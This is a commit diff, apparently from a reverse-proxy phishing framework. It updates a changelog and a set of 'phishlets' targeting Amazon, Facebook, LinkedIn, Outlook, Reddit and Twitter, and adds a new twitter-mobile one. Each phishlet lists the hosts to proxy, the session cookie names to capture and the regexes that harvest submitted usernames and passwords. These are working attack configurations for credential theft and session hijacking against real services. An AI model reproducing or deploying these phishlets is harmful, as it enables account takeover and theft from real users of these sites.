updated phishlets to work with new cookie detection

CHANGELOG.md

@@ -6,4 +6,6 @@
 * Completely rewrote authentication token detection and database storage (previously captured sessions will not load properly in this version).
 * Phishlets now properly handle `.website.com` vs `website.com` cookie domains
 * Added support for regular expressions in detecting authentication token cookie names. Use `regexp` flag with `,` separator in cookie name like this `_session_[0-9]{6},regexp`.
+* Added `auth_urls` setting to phishlets where you can add URL path regular expressions that will be detected in HTTP requests. If matched, session will be considered authorized.
+* Added support for regular expressions in detecting POST username and password key names. Use `regexp` flag with `,` separator in `key` under `user_regex` and `pass_regex` like this `login_[0-9]{8},regexp`.
 * Fixed bug that prevented usage of empty subdomains in phishlets.

phishlets/amazon.yaml

@@ -1,6 +1,6 @@
 name: 'amazon'
 author: '@customsync'
-min_ver: '2.0.0'
+min_ver: '2.1.0'
 proxy_hosts:
   - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true}
   - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
@@ -13,8 +13,8 @@ sub_filters:
   - {hostname: 'images-na.ssl-iamges-amazon.com', sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
   - {hostname: 'images-na.ssl-iamges-amazon.com', sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
 auth_tokens:
-  - domain: 'amazon.com'
-    keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','x-wl-uid','skin','a-ogbcbff']
+  - domain: '.amazon.com'
+    keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff']
 user_regex:
   key: 'email'
   re: '(.*)'

phishlets/facebook.yaml

@@ -1,6 +1,6 @@
 name: 'facebook'
 author: '@mrgretzky'
-min_ver: '2.0.0'
+min_ver: '2.1.0'
 proxy_hosts:
   - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
   - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
@@ -15,7 +15,7 @@ sub_filters:
   - {hostname: 'm.facebook.com', sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
   - {hostname: 'static.xx.fbcdn.net', sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
 auth_tokens:
-  - domain: 'facebook.com'
+  - domain: '.facebook.com'
     keys: ['c_user','xs','sb']
 user_regex:
   key: 'email'

phishlets/linkedin.yaml

@@ -1,14 +1,14 @@
 name: 'linkedin'
 author: '@mrgretzky'
-min_ver: '2.0.0'
+min_ver: '2.1.0'
 proxy_hosts:
   - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
 sub_filters:
   - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
   - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
   - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
 auth_tokens:
-  - domain: 'www.linkedin.com'
+  - domain: '.www.linkedin.com'
     keys: ['li_at']
 user_regex:
   key: 'session_key'

phishlets/outlook.yaml

@@ -1,6 +1,6 @@
 name: 'outlook'
 author: '@mrgretzky'
-min_ver: '2.0.0'
+min_ver: '2.1.0'
 proxy_hosts:
   - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
   - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
@@ -16,7 +16,7 @@ sub_filters:
   - {hostname: 'account.live.com', sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
   - {hostname: 'account.live.com', sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
-  - domain: 'live.com'
+  - domain: '.live.com'
     keys: ['WLSSC']
 user_regex:
   key: 'login'

phishlets/reddit.yaml

@@ -1,6 +1,6 @@
 name: 'reddit'
 author: '@customsync'
-min_ver: '2.0.0'
+min_ver: '2.1.0'
 proxy_hosts:
   - {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true}
   - {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false}
@@ -14,7 +14,7 @@ sub_filters:
   - {hostname: 'events.reddit.com', sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
   - {hostname: 'events.reddit.com', sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
 auth_tokens:
-  - domain: 'www.reddit.com'
+  - domain: '.reddit.com'
     keys: ['reddit_session']
 user_regex:
   key: 'username'

phishlets/twitter-mobile.yaml

@@ -0,0 +1,22 @@
+name: 'twitter-mobile'
+author: '@white_fi'
+min_ver: '2.0.0'
+proxy_hosts:
+  - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
+  - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
+  - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
+sub_filters:
+  - {hostname: 'mobile.twitter.com', sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {hostname: 'abs.twimg.com', sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {hostname: 'api.twitter.com', sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+auth_tokens:
+  - domain: 'twitter.com'
+    keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
+user_regex:
+  key: 'session[username_or_email]'
+  re: '(.*)'
+pass_regex:
+  key: 'session[password]'
+  re: '(.*)'
+landing_path:
+  - '/login'

phishlets/twitter.yaml

@@ -1,17 +1,17 @@
 name: 'twitter'
 author: '@white_fi'
-min_ver: '2.0.0'
+min_ver: '2.1.0'
 proxy_hosts:
-  - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
-  - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
+  - {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true}
+  - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: false, is_landing: false}
   - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
 sub_filters:
-  - {hostname: 'mobile.twitter.com', sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {hostname: 'twitter.com', sub: '', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
   - {hostname: 'abs.twimg.com', sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
   - {hostname: 'api.twitter.com', sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
-  - domain: 'twitter.com'
-    keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
+  - domain: '.twitter.com'
+    keys: ['kdt','_twitter_sess','twid','auth_token']
 user_regex:
   key: 'session[username_or_email]'
   re: '(.*)'